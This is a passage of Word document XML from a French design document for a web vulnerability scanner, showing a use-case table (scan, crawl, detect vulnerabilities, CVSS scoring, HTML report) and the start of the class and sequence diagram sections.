                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Cas d'utilisation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="384DED85" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Acteur</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="209DE0C8" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Précondition</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2721" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="003366"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="63C52DD9" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:color w:val="FFFFFF"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Postcondition</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="4C66A197" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="34A4505E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>UC1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1EAC0383" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Lancer un scan complet</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="480F7881" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Analyste</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="148EC462" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>URL cible accessible</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2721" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="44109D12" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Rapport HTML généré</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="40D1C7F8" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="185206D5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>UC2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="1DDCDF37" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Configurer les options</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="3D6BFF8C" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Analyste</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="73376B08" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>—</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2721" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="3012158E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Options enregistrées dans ScanOptions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="60E82051" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AF157B3" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>UC3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="27BE495E" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>S'authentifier</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4A115EBC" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Analyste</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="176C25FF" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Credentials valides</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2721" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="2AFA56FE" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Session HTTP authentifiée</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="35B97304" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="442CBFA8" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>UC4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="03C17005" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Exporter le rapport</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="2EF31715" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Analyste</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="3EC93B00" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Scan terminé</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2721" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="48E93595" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Fichier .html sauvegardé</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="5250E6CE" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="267E2AC9" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>UC5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="513C1BB0" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Crawler l'application</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09FF1166" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Système</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="194B1D18" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>URL de base</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2721" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="71A7ED8B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>list[Endpoint] découverts</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="14124D51" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="04B349AD" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>UC6</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="6D1E2758" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Détecter les vulnérabilités</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="38D84F55" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Système</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="5D684D2A" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Endpoints disponibles</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2721" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="05652392" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>list[Vulnerability] raw</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="747DABD7" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="1D2CD586" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>UC7</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C0838E4" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Évaluer les scores CVSS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="427B5A0B" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Système</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="113A4253" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Vulnérabilités raw</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2721" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="030F13F7" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Vulnérabilités enrichies</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="006A6D93" w14:paraId="07E1BD7C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="680" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="14365165" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>UC8</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2551" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="02DD44AB" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Générer le rapport HTML</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1417" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="7DA017B4" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Système</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1984" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="01BA4E75" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Vulnérabilités scorées</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2721" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EEF4FB"/>
          </w:tcPr>
          <w:p w14:paraId="63607E7F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t>Fichier HTML autonome</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7A2F0560" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="006A6D93"/>
    <w:p w14:paraId="78EE3114" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="8" w:space="1" w:color="003366"/>
        </w:pBdr>
        <w:spacing w:before="280" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:color w:val="003366"/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>2.3  Diagramme de Classes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64DDBA2F" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Le diagramme de classes présente la structure statique du système avec les sept classes principales, leurs attributs, méthodes et relations. Les relations de composition (losange plein) indiquent que Scanner possède et crée ses dépendances ; les relations d'association simple indiquent une utilisation sans possession.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="293C88E6" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="160" w:after="40"/>
        <w:rPr>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
          <w:i/>
          <w:color w:val="505050"/>
          <w:sz w:val="18"/>
          <w:lang w:val="fr-FR"/>
        </w:rPr>
        <w:t>Code : Diagramme de classes complet du scanner</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C0007D3" w14:textId="77777777" w:rsidR="000C0001" w:rsidRDefault="000C0001">
      <w:pPr>
        <w:spacing w:before="200" w:after="200"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline xmlns:wp="http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing" distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5900000" cy="4231818"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2003" name="diag_classes"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diag_classes"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" r:embed="rId23"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5900000" cy="4231818"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="06B1F25D"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2.4  Diagramme de Séquence</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73AB8ED5" w14:textId="77777777" w:rsidR="006A6D93" w:rsidRPr="00611874" w:rsidRDefault="00000000">
